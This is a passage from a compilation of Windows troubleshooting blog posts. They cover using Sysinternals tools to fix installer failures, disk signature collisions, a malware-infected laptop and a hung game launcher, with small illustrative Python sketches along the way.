Confident I’d solved the mystery, I right-clicked on each share and disconnected it. I rebooted the laptop to verify my fix (workaround to be precise), and to my immense satisfaction, the logon proceeded to the desktop within a few seconds. The case was closed! As for why the delays were unusually long, I haven’t had the time – or need – to investigate further. The point of this story isn’t to highlight this particular issue, but to illustrate the use of the Sysinternals tools and troubleshooting techniques to solve problems.

TechEd Europe, which took place in Amsterdam last week, gave me another chance to reprise the talks I’d given at TechEd US. I delivered the same Case of the Unexplained troubleshooting session I had at TechEd US, but this time I had the pleasure of sharing this very fresh and personal case. You can watch it and my other TechEd sessions either by going to my webcasts page, which lists all of my major sessions posted online, or by following these links directly:

Announcing Trojan Horse, the Novel!
https://blogs.technet.microsoft.com/markrussinovich/2012/05/06/announcing-trojan-horse-the-novel/
Tue, 08 May 2012 03:00:00 +0000

Many of you have read Zero Day, my first novel. It’s a cyberthriller that features Jeff Aiken and the beautiful Daryl Haugen, computer security experts who save the world from a devastating cyberattack. Its reviews and sales exceeded my expectations, so I’m especially excited about the sequel, Trojan Horse, which I think is even more timely and exciting. Trojan Horse, like Zero Day, is an action-packed cyberthriller on a global scale, pitting Jeff and Daryl against international forces in a fight for world security and their lives. Rather than telling you more, I’ll let the Trojan Horse video trailer, below, show you.

Trojan Horse will be published on September 4, but you can preorder it now from your favorite online book seller (in the US only for now, but Zero Day’s Korean publisher has already purchased foreign publishing rights). Find the ordering links, read more about Trojan Horse, see my other books, check out my book blog and find out where I’m speaking on my new website, markrussinovich.com. Preorder Trojan Horse now and tell your friends!

The Case of My Mom’s Broken Microsoft Security Essentials Installation
https://blogs.technet.microsoft.com/markrussinovich/2012/01/03/the-case-of-my-moms-broken-microsoft-security-essentials-installation/
Wed, 04 Jan 2012 21:00:00 +0000

As a reader of this blog, I suspect that you, like me, are the IT support staff for your family and friends. And I bet many of you performed system maintenance duties when you visited your family and friends during the recent holidays. Every time I visit my mom, I typically spend a few minutes running Sysinternals Process Explorer and Autoruns, as well as the Control Panel’s Program Uninstall page, to clean out the junk that’s somehow managed to accumulate since my last visit.

This holiday, though, I was faced with more than a regular checkup. My mom recently purchased a new PC, and as a result I spent a frustrating hour removing the piles of crapware the OEM had loaded onto it (these days I would recommend getting a Microsoft Signature PC, which comes crapware-free). I say frustrating because of the time it took and because even otherwise simple applications were implemented as monstrosities with complex and lengthy uninstall procedures. Even the OEM’s warranty and help files were full-blown installations. Making matters worse, several of the craplets failed to uninstall successfully, either throwing error messages or leaving behind stray fragments that forced me to hunt them down and execute precision strikes.

As my cleaning was drawing to a close, I noticed that the antimalware the OEM had put on the PC had a 1-year license, after which she’d have to pay to continue service. With excellent free antimalware solutions on the market, there’s no reason for any consumer to pay for antimalware, so I promptly uninstalled it (which of course was a multistep process that took over 20 minutes and yielded several errors). I then headed to the Internet to download what I – not surprisingly given my affiliation – consider the best free antimalware solution, Microsoft Security Essentials (MSE). A couple of minutes later the setup program was downloaded and the installation wizard launched. After clicking through the first few pages it reported it was going to install MSE, but then immediately complained that an “error has prevented the Security Essentials setup wizard from completing successfully.”:

The suggestion to “restart your computer and try again” is intended to deal with failures caused by interference from an unfinished uninstall of existing antimalware (or a hope that whatever unexpected error condition caused the problem is transient). I’d just rebooted, so it didn’t apply. Clicking the “Get help on this issue” link provided some generic troubleshooting steps, like uninstalling other antimalware, ensuring that the Windows Installer service is configured and running (though by default it isn’t running on Windows 7 since it’s demand-start), and if all else fails, contacting customer support.

I suspected that whatever I’d run into was rare enough that customer support wouldn’t be able to help (and what would they say if they knew Mark Russinovich was calling for tech support?), especially when I found no help on the web for error code 0x80070643. My brother-in-law, who is also a programmer and the tech support for his neighborhood, was watching over my shoulder to pick up some tips, so the pressure was on to fix the problem. Out came my favorite troubleshooting tool, Sysinternals Process Monitor (remember, “when in doubt, run Process Monitor”).

I reran the MSE setup while capturing a trace with Process Monitor. Then I opened Process Monitor’s process tree view to find what processes were involved in the attempted install and identified Msiexec.exe (Windows Installer) and a few launcher processes. I also saw that Setup.exe launched Wermgr.exe, the Windows Error Reporting Manager, presumably to upload an error report to Microsoft:

I turned my attention back to the trace output and configured a filter that excluded everything but these processes of interest. Then I began the arduous job of working my way through tens of thousands of operations, hoping to find the needle in the haystack that revealed why the setup choked with error 0x80070643.

As I scanned quickly to get an overall view, I noticed some writes to log files:

However, the messages in them revealed nothing more than the cryptic error message shown in the dialog.

After a few minutes I decided I should work my way back from where in the trace operations the error occurred, so returned to the tree, selected Wermgr.exe, and clicked “Go to event”:

This would ideally be just after the setup encountered the fatal condition. Then I paged up in the trace, looking for clues. After several more minutes I noticed a pattern that accounted for almost all the operations up to that point: Setup.exe was enumerating all the system’s installed applications. I determined that by observing that it queried multiple installer-related registry locations, and I could see the names of the applications it found in the Details column for some of them. Here, for example, is one of the OEM’s programs, another help-file-as-an-application, that I hadn’t bothered to uninstall:

I could now move quickly through the trace by scanning for application names. A minute later I stopped short, spotting something I shouldn’t have seen: “Microsoft Security Essentials”:

I knew I hadn’t seen it listed in the installed programs list in the Control Panel in my earlier uninstall-fest, which I confirmed by rechecking.

Why were there traces of MSE when it hadn’t been installed, and in fact wouldn’t install? I don’t know for sure, but after pondering this for a few minutes I came to the conclusion that the software my mother had used to transfer files and settings from her old system had copied parts of the MSE installation she had on the old PC. She likely had used whatever utility the OEM put on the PC, though I would recommend using Windows Easy Transfer. But the reason didn’t really matter at this point; what mattered was getting MSE to install successfully, and I believed I had found the problem. I deleted the keys, reran the setup, and…hit the same error.

Not ready to give up, I captured another trace. Suspecting that setup was tripping on other fragments of the phantom installation, I searched for “security essentials” in the new trace and found another reference before the setup bailed. To avoid performing this step multiple more times, I went to the registry and performed the same search, deleting about two dozen other keys that had “security essentials” somewhere in them.
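A registry-wide search like this can also be scripted. As an illustrative sketch only, the recursion below walks a nested dictionary standing in for a registry hive, with hypothetical key names and values; a real version on Windows would perform the same walk against the live registry with the winreg module.

```python
def find_keys(hive, needle, path=""):
    """Recursively collect paths of keys and values whose name or string
    data contains the needle (case-insensitive). `hive` is a nested dict
    standing in for a registry hive; on Windows the same traversal would
    use the winreg module against the live registry."""
    matches = []
    for name, child in hive.items():
        full = f"{path}\\{name}" if path else name
        if needle.lower() in name.lower():
            matches.append(full)
        elif isinstance(child, str) and needle.lower() in child.lower():
            matches.append(full)
        if isinstance(child, dict):
            matches.extend(find_keys(child, needle, full))
    return matches

# Hypothetical fragment of installer-related registry data:
hive = {"Products": {"123ABC": {"ProductName": "Microsoft Security Essentials"},
                     "456DEF": {"ProductName": "Some Other App"}},
        "Features": {}}
print(find_keys(hive, "security essentials"))
```

Collecting every match up front, as here, avoids the trace-capture round trips described above.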

I held my breath and ran the installer again, but no go:

The error code was different, so I had apparently made some progress, but a web search still didn’t yield any clues. I captured yet another trace and began poring through the operations. The install made its way past the installed-application enumeration, generating tens of thousands more operations. I scanned back from where Wermgr.exe launched, but was quickly overwhelmed. I just couldn’t spot what had made it unhappy, and that was assuming that whatever it was would be visible in the trace. My brother-in-law was growing skeptical, but I told him I wasn’t done. I was motivated by the challenge as much as by the fact that I couldn’t let him tell his work buddies that he’d watched me fail.

I decided I needed the guidance of a successful installation’s trace so that I could find where things went astray. When it’s an option, like it was here, side-by-side trace comparison is a powerful troubleshooting technique. I switched to my laptop, launched a Windows 7 virtual machine, and generated a trace of MSE’s successful installation on a clean system. I then copied the log from my mom’s computer and opened both traces in separate windows, one on the top of the screen and one on the bottom.

Scrolling through the traces in tandem, I was able to synchronize them simply by looking at the shapes that the operation paths make in the window and occasionally ensuring that they were indeed in sync by looking closely at a few operations. Though it was laborious, I progressed through the trace, at times losing sync but then gaining it back. One trace being from a clean system and the other with lots of software installed caused relatively minor differences I could discount.
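The manual synchronization described above can be partially automated. As a sketch with invented, simplified events (the UpgradeCodes key name is the one that figures in this case), Python’s difflib can align two sequences of (operation, path) pairs extracted from the traces and flag the stretches where they diverge:

```python
import difflib

# Hypothetical simplified traces: (operation, path) pairs extracted from
# a failing and a working Process Monitor log.
failing = [("RegOpenKey", r"HKCR\Installer\Products"),
           ("RegOpenKey", r"HKCR\Installer\UpgradeCodes\11BB99F8B7FD53D4398442FBBAEF050F"),
           ("RegQueryValue", r"HKCR\Installer\UpgradeCodes\11BB99F8B7FD53D4398442FBBAEF050F")]
working = [("RegOpenKey", r"HKCR\Installer\Products")]

matcher = difflib.SequenceMatcher(a=failing, b=working, autojunk=False)
for tag, a0, a1, b0, b1 in matcher.get_opcodes():
    if tag != "equal":
        # Events present in one trace but not the other are candidates
        # for where the two runs went astray.
        print(tag, failing[a0:a1], working[b0:b1])
```

The “equal” runs correspond to the stretches where the traces stay in sync; everything else is what a side-by-side comparison would surface.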

Finally after about 10 minutes, I found an operation that differed in what seemed to be a significant way: an open of the registry key HKCR\Installer\UpgradeCodes\11BB99F8B7FD53D4398442FBBAEF050F returned SUCCESS in the failing trace:

but NAME NOT FOUND in the working one:

Another bit of the broken installation it seemed, but without any reference to MSE, so one that hadn’t shown up in my registry search. I deleted the key, and with some forced confidence told my brother-in-law that I had solved the problem. Then I crossed my fingers and launched the setup again, praying that it would work and I could get back to the holiday festivities that were in full swing downstairs.

Bingo, the setup chugged along for a few seconds and finished by congratulating me on my successful install:

Another seemingly unsolvable problem conquered with Sysinternals, application of a few useful troubleshooting techniques, and some perseverance. My brother-in-law was suitably impressed and had a good story for when he returned to the office after the break, and my mother had a faster PC with free antimalware service.

I followed up with the MSE team and they are working on improving the error codes and making the setup program more robust against these kinds of issues. They also pointed me at some additional resources in case you happen to run into the same kind of problem. First, there’s a Microsoft support tool, MscSupportTool.exe, that extracts the MSE installation log files, which might give some additional information. There’s also a Microsoft ‘fix-it tool’ that addresses some installation corruption problems.

I hope that your holiday troubleshooting met with similar success and wish that your 2012 is free of computer problems!

The Case of the Installer Service Error
https://blogs.technet.microsoft.com/markrussinovich/2011/11/27/the-case-of-the-installer-service-error/
Mon, 28 Nov 2011 22:00:00 +0000

This case unfolds with a network administrator charged with the rollout of the Microsoft Windows Intune client software on their network. Windows Intune is a cloud service that manages systems on a corporate network, keeping their software up to date and enabling administrators to monitor the health of those systems from a browser interface. It requires a client-side agent, but on one particular system the client software failed to install, reporting this error message:

The dialog’s error message translates to “The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance.”

The administrator, having seen one of my Case of the Unexplained presentations where I advised, “when in doubt, run Process Monitor,” downloaded a copy from Sysinternals.com and captured a trace of the failed install. He followed the standard troubleshooting technique of looking backward from the end of the trace for operations that might be the cause, but after about a half hour of analysis he gave up and switched to a different approach. Instead of looking for clues in the trace, he thought he might be able to find clues by comparing the trace of the failing system to another captured on a system where the client installed successfully.

A few minutes later he had a second trace to compare side-by-side. He set a filter to include only events generated by Msiexec.exe, the client setup program, and proceeded through the events in the trace from the problematic system, correlating them with corresponding events on the working one. He eventually got to a point where the two traces diverged. Both traces have references to HKLM\System\CurrentControlSet\Services\BFE, but the failed trace then has registry queries of the ComputerName registry key:

The working system’s trace, on the other hand, continues with operations from a new instance of Msiexec.exe, something he noticed because the process ID of the subsequent Msiexec.exe operations was different from that of the earlier ones:

It still wasn’t clear from the failed trace what caused the divergence, however. After pondering the situation for a few minutes he was just about to give up when the thought crossed his mind that the answer might lie in the operations that the filter was hiding. He deleted the filter he’d applied that included only events from Msiexec.exe from both traces and resumed comparing traces from the point of divergence.

He immediately saw that the trace from the working system had many events from a Svchost.exe process that weren’t present in the failed trace. Working under the assumption that the Svchost.exe activity was unrelated, he added a filter to exclude it. Now the traces lined up again with events from Services.exe matching in both traces:

The matching operations didn’t go on for very long, however. Only a dozen or so operations later the trace from the failing system had a reference to HKLM\System\CurrentControlSet\Services\Msiserver\ObjectName with a NAME NOT FOUND error:

The trace from the working system had the same operation, but with a SUCCESS result:

Sure enough, right-clicking on the path and selecting “Jump to…” from Process Monitor’s context menu confirmed that not only was the ObjectName value missing from the failing system’s Msiserver key, but the entire key was empty. On the working system it was populated with the registry values required to configure a Windows service:

Somehow the service registration for the MSI service had been corrupted, something the initial error dialog had stated, but without guidance for how to fix the problem. How the service had become corrupted would likely remain forever a mystery, but the important thing now was fixing it. To do so, he simply used Regedit’s export functionality to save the contents of the key from the working system to a .reg file and then imported the file on the corrupted system. After the import, he reran the Windows Intune installer and it succeeded without any issues.

With the help of Process Monitor and some diligence, he’d spent about forty-five minutes fixing a problem that would have ended up costing him several hours if he’d had to reimage the system and restore its applications and configuration.

Fixing Disk Signature Collisions
https://blogs.technet.microsoft.com/markrussinovich/2011/11/06/fixing-disk-signature-collisions/
Tue, 08 Nov 2011 01:00:00 +0000

Disk cloning has become common as IT professionals virtualize physical servers using tools like Sysinternals Disk2vhd and use a master virtual hard disk image as the base for copies created for virtual machine clones. In most cases, you can operate with cloned disk images unaware that they have duplicate disk signatures. However, on the off chance you attach a cloned disk to a Windows system that has a disk with the same signature, you will suffer the consequences of disk signature collision, which renders unbootable any of the disk’s installations of Windows Vista or newer. Reasons for attaching a disk include offline injection of files, offline malware scanning, and – somewhat ironically – repairing a system that won’t boot. This risk of corruption is the reason I warn in Disk2vhd’s documentation not to attach a VHD produced by Disk2vhd to the system that generated the VHD using the native VHD support added in Windows 7 and Windows Server 2008 R2.

I’ve gotten emails from people who have run into the disk signature collision problem, and a Web search shows that there’s little clear help for fixing it. So in this post, I’ll give you easy repair steps you can follow if you’ve got a system that won’t boot because of a disk signature collision. I’ll also explain where disk signatures are stored, how Windows uses them, and why a collision makes a Windows installation unbootable.

Disk Signatures

A disk signature is a four-byte identifier stored at offset 0x1B8 in a disk’s Master Boot Record (MBR), which is written to the first sector of a disk. This screenshot of a disk editor shows that the signature of my development system’s disk is 0xE9EB3AA5 (the value is stored in little-endian format, so the bytes appear in reverse order):
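Given a raw copy of the first sector (on Windows, reading it from a physical drive requires administrative rights), extracting the signature is a one-line unpack. The sketch below builds a synthetic 512-byte sector using the signature value from the screenshot rather than reading a real disk:

```python
import struct

def disk_signature(mbr: bytes) -> int:
    """Extract the four-byte disk signature stored little-endian at
    offset 0x1B8 of a Master Boot Record (the disk's first 512 bytes)."""
    (sig,) = struct.unpack_from("<I", mbr, 0x1B8)
    return sig

# Synthetic sector: the on-disk byte order A5 3A EB E9 reads back as
# the display value 0xE9EB3AA5.
mbr = bytearray(512)
mbr[0x1B8:0x1BC] = bytes([0xA5, 0x3A, 0xEB, 0xE9])
mbr[0x1FE:0x200] = b"\x55\xAA"  # standard boot-sector signature bytes
print(hex(disk_signature(bytes(mbr))))  # → 0xe9eb3aa5
```

The `"<I"` format string does the little-endian reversal that the post describes doing by eye in the disk editor.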

Windows uses disk signatures internally to map objects like volumes to their underlying disks, and starting with Windows Vista, it also uses disk signatures in its Boot Configuration Database (BCD), which is where it stores the information the boot process uses to find boot files and settings. When you look at a BCD’s contents using the built-in Bcdedit utility, you can see the three places that reference the disk signature:

The BCD actually has additional references to the disk signature in alternate boot configurations, like the Windows Recovery Environment, resume from hibernate, and the Windows Memory Diagnostic boot, that don’t show up in the basic Bcdedit output. Fixing a collision requires knowing a little about the BCD structure, which is actually a registry hive file that Windows loads under HKEY_LOCAL_MACHINE\BCD00000000:

Here’s the element corresponding to one of the entries seen in the Bcdedit output, where you can see the same disk signature that’s stored in my disk’s MBR:

Disk Signature Collisions

Windows requires the signatures to be unique, so when you attach a disk that has a signature equal to one already attached, Windows keeps the disk in “offline” mode and doesn’t read its partition table or mount its volumes. This screenshot shows how the Windows Disk Management administrative utility presents an offline disk that I caused when I attached the VHD Disk2vhd created for my development system to that system:

If you right-click on the disk, the utility offers an “Online” command that will cause Windows to analyze the disk’s partition table and mount its volumes:

When you choose the Online menu option, Windows will without warning generate a new random disk signature and assign it to the disk by writing it to the MBR. It will then be able to process the MBR and mount the volumes present, but when Windows updates the disk signature, the BCD entries become orphaned, linked with the previous disk signature, not the new one. The boot loader will fail to locate the specified disk and boot files when booting from the disk and give up, reporting the following error:

Restoring a Disk Signature

One way to repair a disk signature corruption is to determine the new disk signature Windows assigned to the disk, load the disk’s BCD hive, and manually edit all the registry values that store the old disk signature. That’s laborious and error-prone, however. In some cases, you can use Bcdedit commands to point the device elements at the new disk signature, but that method doesn’t work on attached VHDs and so is unreliable. Fortunately, there’s an easier way. Instead of updating the BCD, you can give the disk its original disk signature back.

First, you have to determine the original signature, which is where knowing a little about the BCD becomes useful. Attach the disk you want to fix to a running Windows system. It will be online and Windows will assign drive letters to the volumes on the disk, since there’s no disk signature collision. Load the BCD off the disk by launching Regedit, selecting HKEY_LOCAL_MACHINE, and choosing Load Hive from the File menu:

Navigate to the disk’s hidden \Boot directory in the file dialog, which resides in the root directory of one of the disk’s volumes, and select the file named “BCD”. If the disk has multiple volumes, find the Boot directory by just entering x:\boot\bcd, replacing the “x:” with each of the volume’s drive letters in turn. When you’ve found the BCD, pick a name for the key into which it loads, select that key, and search for “Windows Boot Manager”. You’ll find a match under a key named 12000004, like this:

Select the key named 11000001 under the same Elements parent key and note the four-byte disk signature located at offset 0x38 (remember to reverse the order of the bytes).
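If you export that element’s binary value (or read it from a saved hive), the byte reversal can be done programmatically. A small sketch, using a hypothetical element blob that is simply zero-padded up to offset 0x38, where the signature bytes from this post’s example sit:

```python
def bcd_disk_signature(element: bytes) -> str:
    """Read the four-byte, little-endian disk signature at offset 0x38 of
    a BCD device element's binary value and render it in display order."""
    raw = element[0x38:0x3C]
    return raw[::-1].hex()

# Hypothetical element blob: 0x38 bytes of header data we don't parse,
# then the signature bytes as they'd appear in Regedit, then padding.
blob = bytes(0x38) + bytes([0xA5, 0x3A, 0xEB, 0xE9]) + bytes(8)
print(bcd_disk_signature(blob))  # prints e9eb3aa5
```

The reversed hex string is exactly the ID you’ll feed to Diskpart in the next step.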

With the disk signature in hand, open an administrative command prompt window and run Diskpart, the command-line disk management utility. Enter “select disk 2”, replacing “2” with the disk ID that the Disk Management utility shows for the disk. Now you’re ready for the final step, setting the disk signature to its original value with the command “uniqueid disk id=e9eb3aa5”, substituting the ID with the one you saw in the BCD:

When you execute this command, Windows will immediately force the disk and its corresponding volumes offline to avoid a signature collision. Avoid bringing the disk online again or you’ll undo your work. You can now detach the disk and because the disk signature matches the BCD again, Windows installations on the disk will boot successfully. You might find yourself in a situation where you have no choice but to cause a collision and have Windows update a disk signature, but at least now you know how to repair it when you do.
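If you have several clones to repair, the two Diskpart commands can be run unattended via “diskpart /s scriptfile”. A minimal sketch that generates such a script, using the disk number and signature from this example:

```python
def diskpart_script(disk_number: int, signature: str) -> str:
    """Build a script suitable for `diskpart /s <file>` that restores a
    disk's original signature. The disk number and signature here are the
    example values from this post; substitute your own."""
    return f"select disk {disk_number}\nuniqueid disk id={signature}\n"

script = diskpart_script(2, "e9eb3aa5")
print(script, end="")
```

Writing the result to a file and passing it to Diskpart performs the same two steps described above without interactive input.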

The Case of the Mysterious Reboots
https://blogs.technet.microsoft.com/markrussinovich/2011/10/02/the-case-of-the-mysterious-reboots/
Mon, 03 Oct 2011 01:00:00 +0000

This case opens when a Sysinternals power user, who also works as a system administrator at a large corporation, had a friend report that their laptop had become unusable: whenever the friend connected it to a network, the laptop would reboot. The power user, upon getting hold of the laptop, first verified the behavior by connecting it to a wireless network. The system instantly rebooted, first into safe mode, then again back into a normal Windows startup. He tried booting the laptop into safe mode directly, hoping that whatever was causing the problem would be inactive in that mode, but logging on only resulted in an automatic logoff. Returning to a normal boot, he noticed that Microsoft Security Essentials (MSE) was installed and tried to launch it. Double-clicking the icon had no effect, however, and double-clicking its entry in the Programs and Features section of the Control Panel resulted in an error message:

Hovering his mouse over the MSE icon in the start menu gave the explanation: the link was pointing at a bogus location likely created by malware:

Because he couldn’t get to the network, he couldn’t easily repair the corrupted MSE installation. Wondering if the Sysinternals tools might help, he copied Process Explorer and Autoruns to a USB key, and then copied them from the key to the laptop, which he was now convinced was infected. Launching Process Explorer, he was greeted with the following process tree:

In my Blackhat presentation, Zero Day Malware Cleaning with the Sysinternals Tools, I present a list of characteristics commonly exhibited by malicious processes. They include having no icon, company name, or description, residing in the %Systemroot% or %Userprofile% directories, and being “packed” (encrypted or compressed). While there’s a class of sophisticated malware that doesn’t have any of these attributes, most malware still does. This case is a great example. Process Explorer checks for the signatures of common executable compression tools like UPX, and applies heuristics such as recognizing Portable Executable image layouts typical of compression engines, highlighting matches in a “packed” highlight color. The default color, fuchsia, is visible on about a dozen processes in the process view. Further, every single one of the highlighted processes lacks a description and company name (though a few have icons).
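Process Explorer's detection is considerably more thorough, but the underlying idea can be approximated: compressed or encrypted images have near-random byte distributions, and packers like UPX leave recognizable section names behind. A crude Python sketch of both checks; the entropy threshold and marker list are my own illustrative choices, not Process Explorer's actual heuristics.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: values approaching 8.0 indicate near-random
    (compressed or encrypted) data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def looks_packed(image: bytes, threshold: float = 7.0) -> bool:
    """Crude packing check: a known packer section name, or high entropy."""
    if b"UPX0" in image or b"UPX1" in image:  # section names UPX leaves behind
        return True
    return shannon_entropy(image) > threshold
```

Plain, repetitive data scores near zero entropy and passes; a UPX-packed image trips the marker check even before the entropy test runs.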

Many of them also have names that are the same as, or similar to, those of legitimate Windows system executables. The one highlighted below has a name that matches the Windows Svchost.exe executable, but has an icon (borrowed from Adobe Flash) and resides in a nonstandard directory, C:\Windows\Update.1:

Another process with a name not matching that of any Windows executable, but whose name, Svchostdriver.exe, is similar enough to confuse someone not intimately familiar with Windows internals, actually has TCP/IP sockets listening for connections, presumably from a botmaster:
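This name-mimicry trick can be screened for mechanically: the real Svchost.exe runs only from %Systemroot%\System32, so any exact or near match running from anywhere else deserves scrutiny. A simplified sketch of that rule in Python; the stem list and substring matching are my own illustrative choices.

```python
import ntpath  # Windows path semantics regardless of host platform

# Stems of system executables that malware commonly imitates (a short,
# illustrative list), and the only directory the real ones run from.
SYSTEM_STEMS = {"svchost", "lsass", "csrss", "services"}
SYSTEM_DIR = r"c:\windows\system32"

def is_suspicious(image_path: str) -> bool:
    """Flag a process whose name matches or nearly matches a Windows
    system executable but which runs from outside System32."""
    directory, name = ntpath.split(image_path.lower())
    stem = name.rsplit(".", 1)[0]
    near_match = any(s in stem for s in SYSTEM_STEMS)
    return near_match and directory != SYSTEM_DIR
```

Both malicious processes from this case trip the check: Svchost.exe in C:\Windows\Update.1 matches a system name in the wrong directory, and Svchostdriver.exe matches on the "svchost" stem.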

There was no question that the computer was severely infected. Autoruns revealed malware using several different activation points, and explained that the reason even Safe Mode with Command Prompt didn’t work properly was that a bogus executable called Services32.exe (another legitimate-looking name) had registered as the Safe Mode AlternateShell, which is by default Cmd.exe (command prompt):
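The check Autoruns performs here is simple to state: the AlternateShell value under HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot should name the stock command prompt, and anything else warrants investigation. A minimal sketch; on a live system the value would be read with winreg on Windows, so only the comparison itself is shown here.

```python
# Expected values for the SafeBoot AlternateShell registry value;
# accepting a full path as well as the bare name is my own assumption.
EXPECTED_SHELLS = {"cmd.exe", r"c:\windows\system32\cmd.exe"}

def alternate_shell_hijacked(value: str) -> bool:
    """Anything other than the stock command prompt registered as the
    Safe Mode shell deserves investigation."""
    return value.strip().lower() not in EXPECTED_SHELLS
```

On the infected laptop this would have flagged Services32.exe immediately.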

My recommendation for cleaning malware is to first leverage antimalware utilities if possible. Antimalware might address some or all of an infection, so why do work if you don’t have to? But this system couldn’t connect to the Internet, which prevented easily repairing the MSE installation or downloading other antimalware like the Microsoft Malicious Software Removal Tool (MSRT). The power user had seen me use Process Explorer’s suspend functionality at a conference to suspend malware processes, preventing them from restarting each other when someone trying to clean the system terminates one. Maybe if he suspended all the processes that looked malicious he’d be able to connect to the network without having the system reboot? It was worth a shot.

Right-clicking on each malicious process in turn, he selected Suspend from the context menu to put the process into a state of limbo:

When he was done, the process tree looked like this, with suspended processes colored grey:

Now to see if the trick worked: he connected to the wireless network. Bingo, no reboot. Now connected to the Internet, he proceeded to download MSE, install it, and perform a thorough scan of the system. The engine cranked along, reporting discovered infections as it went. When it finished, it had found four separate malware strains, Trojan:Win32/Teniel, Backdoor:Win32/Bafruz.C, Trojan:Win32/Malex.gen!E, and Trojan:Win32/Sisron:

After rebooting, which was noticeably faster than before, he connected to the network without trouble. As a final check, he launched Process Explorer to see if any suspicious processes remained. To his relief, the process tree looked clean:

Another case solved with the help of the Sysinternals tools! The new Windows Sysinternals Administrator’s Reference, authored by Aaron Margosis and me, covers all the tools and their features in detail, giving you the tools and techniques required to solve problems related to sluggish performance, misleading error messages, and application crashes. And if you’re interested in cyber-security, be sure to get a copy of my technothriller Zero Day.

The Case of the Hung Game Launcher
https://blogs.technet.microsoft.com/markrussinovich/2011/07/18/the-case-of-the-hung-game-launcher/
Tue, 02 Aug 2011

I love the cases people send me where the Sysinternals tools have helped them successfully troubleshoot, but nothing is more satisfying than using them to solve my own cases. This case in particular was fun because, well, solving it helped me get back to having fun.

When I have time, I occasionally play PC games to let off steam (pun intended, as you’ll see). One of my favorites over the last few years was the puzzle game, Portal. I enjoyed the first Portal so much that I pre-ordered Portal 2 on Valve’s Steam network when it became available and played through it within a few hours of its release. Since then, I’ve been playing community-developed maps. Last Saturday I started a particularly fun map, a winner from a community map contest, but didn’t have time to finish it in one sitting. The next morning I returned to my PC, double-clicked on the Portal 2 desktop icon, and got the standard Steam launch dialog. The game normally launches in a couple of seconds, but this time the dialog just sat there:

I killed Steam and double-clicked again, but again the dialog hung. I captured a Process Monitor trace and looked at the stacks of Steam’s threads in Process Explorer, but didn’t see any clues. Figuring that perhaps Portal 2’s configuration or installation had somehow been corrupted, I deleted Portal 2, re-downloaded it, and reinstalled it. That didn’t fix the problem, though. With Portal 2 reset to a clean state, that left either Steam or some general Windows issue to blame. The next step was therefore to reinstall Steam.

I first went to the Uninstall or Change a Program page in the Control Panel, but double-clicking on the Steam entry brought up a dialog asking me to confirm uninstalling it and warning that doing so would delete all local content. I didn’t want to risk losing my game settings or have to reinstall all my games, so I aborted the uninstall. Most Windows Installer (MSI)-based installers have a repair option that reinstalls the application without deleting user data or configuration, so I went to the Steam home page, then downloaded and executed the Steam installer. Sure enough, the install wizard offered the repair option:

When I pressed the Next button, though, I was greeted with an obviously misleading error message that reported a network error while trying to read from a local file:

I turned to Process Monitor again and captured a trace of the failed repair operation. The error message referred to a file named SteamInstall[1].msi, so I searched the log file for that string. The first hit was the data value read in a query of a registry value under HKCR\Installer\Products named PackageName:

The next hits, a few operations later, were attempts by the installer to read from the file location printed in the error dialog:

That the installer was reading the file name from an existing registry key and the file’s location was in Internet Explorer’s (IE’s) download cache suggested that it was trying to launch the copy of itself that had performed the initial install. Because I had originally launched the installer via IE directly from the Valve web site, just like I was doing now, the download location was in IE’s download cache, but the file must have aged out and been deleted since then.

The Process Monitor trace revealed that the installer was reading the original location from the registry, so if I pointed the registry at the installer’s new download location, I could trick it into launching itself, rather than looking for the previous copy that was now missing. I scanned the log for the new download location by searching for Steaminstall.msi and found its path, another download cache location:

I then went back to the registry query’s entry, right-clicked on it, and selected “Jump To” from the context menu. That caused Process Monitor to launch Regedit and navigate directly to the registry key, where I updated the LastUsedSource and PackageName values to reflect the new download location:
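The manual Regedit fix amounts to splitting the new package path into the two values Windows Installer consults: LastUsedSource points at the folder, and PackageName holds the file name. Here's a small Python sketch of that split; the path is hypothetical, and the "n;1;" prefix (source type and index) mirrors the format MSI uses for LastUsedSource, though treat the exact value layout as an approximation rather than a specification.

```python
import ntpath  # Windows path semantics regardless of host platform

def msi_source_values(new_msi_path: str) -> dict:
    """Derive registry values that point Windows Installer at a relocated
    package: the folder for LastUsedSource, the file name for PackageName.
    The 'n;1;' prefix is an approximation of the real value format."""
    folder, name = ntpath.split(new_msi_path)
    return {
        "LastUsedSource": "n;1;" + folder + "\\",
        "PackageName": name,
    }

# Hypothetical relocated download, standing in for the IE cache path:
values = msi_source_values(r"C:\Temp\SteamInstall.msi")
```

In practice these would be written back with Regedit (as in this case) or winreg; the sketch only shows how the two values relate to the path.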

Next, I dismissed the installer’s error dialog, which I had left open, and pressed the wizard’s Next button to try the repair again. This time, Steam proceeded to reinstall and the wizard concluded with a message of success:

Crossing my fingers, I launched Portal 2. Steam’s ‘Preparing to Launch’ dialog flashed for a second and then Portal 2’s splash screen took over the screen: case closed. Uninstalling and then reinstalling Steam and all the games would likely have led to the same conclusion, but Process Monitor had surely saved me a lot of time and possibly even my saved game state and configurations. In just a few minutes I was back to solving puzzles of a different kind.